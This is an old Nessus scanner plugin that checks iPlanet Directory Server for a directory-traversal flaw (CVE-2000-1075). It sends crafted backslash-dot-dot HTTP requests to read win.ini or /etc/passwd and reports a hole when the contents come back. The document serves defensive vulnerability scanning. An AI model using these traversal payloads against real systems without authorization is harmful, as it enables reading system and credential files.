#
# This script was written by Renaud Deraison <deraison@cvs.nessus.org>
#
# See the Nessus Scripts License for details
#

if(description)
{
 script_id(10589);
 script_version ("$Revision: 1.8.2.1 $");
 script_bugtraq_id(1839);
 script_cve_id("CVE-2000-1075");
 name["english"] = "iPlanet Directory Server traversal";
 name["francais"] = "iPlanet Directory Server traversal";
 script_name(english:name["english"], francais:name["francais"]);
 
 desc["english"] = "
It is possible to read arbitrary files on
the remote server by prepending /\../\../
in front on the file name.

Solution : See http://www.iplanet.com/downloads/patches/index.html
Risk factor : High";

 desc["francais"] = "Il est possible de lire
n'importe quel fichier sur la machine distante
en ajoutant des points et des anti-slashs devant leur noms,
tels que /\../\../


Solution : cf http://www.iplanet.com/downloads/patches/index.html

Facteur de risque : Elev";

 script_description(english:desc["english"], francais:desc["francais"]);
 
 summary["english"] = "/\../\../\file.txt";
 summary["francais"] = "/\../\../\file.txt";
 script_summary(english:summary["english"], francais:summary["francais"]);
 
 script_category(ACT_ATTACK);
 
 
 script_copyright(english:"This script is Copyright (C) 2000 Renaud Deraison",
		francais:"Ce script est Copyright (C) 2000 Renaud Deraison");
 family["english"] = "CGI abuses";
 family["francais"] = "Abus de CGI";
 script_family(english:family["english"], francais:family["francais"]);
 script_dependencie("find_service.nes");
 script_require_ports("Services/www", 8100);
 exit(0);
}

#
# The script code starts here
#

include("http_func.inc");

port = get_kb_item("Services/www");
if(!port)port = 8100;

if(get_port_state(port))
{
req1 = http_get(item:string("/ca//\\../\\../\\../\\../\\../\\../\\windows/\\win.ini"),
		port:port);
		
req2 = http_get(item:string("/ca/..\\..\\..\\..\\..\\..\\winnt/\\win.ini"),
		port:port);
req3 = http_get(item:string("/ca/..\\..\\..\\..\\..\\..\\/\\etc/\\passwd"),
		port:port);

soc = http_open_socket(port);
if(soc)
{
 send(socket:soc, data:req1);
 r = http_recv(socket:soc);
 http_close_socket(soc);
 if("[windows]" >< r){
 	security_hole(port);
	exit(0);
	}
 soc2 = http_open_socket(port);
 if(!soc2)exit(0);
 send(socket:soc2, data:req2);
 r = http_recv(socket:soc2);
 http_close_socket(soc2);
 if("[fonts]" >< r){
 	security_hole(port);
	exit(0);
	}
  soc3 = http_open_socket(port);
  send(socket:soc3, data:req3);
  r = http_recv(socket:soc3);
  http_close_socket(soc3);
  if(egrep(pattern:".*root:.*:0:0:.*", string:r))
  	security_hole(port);
	exit(0);
 }
}


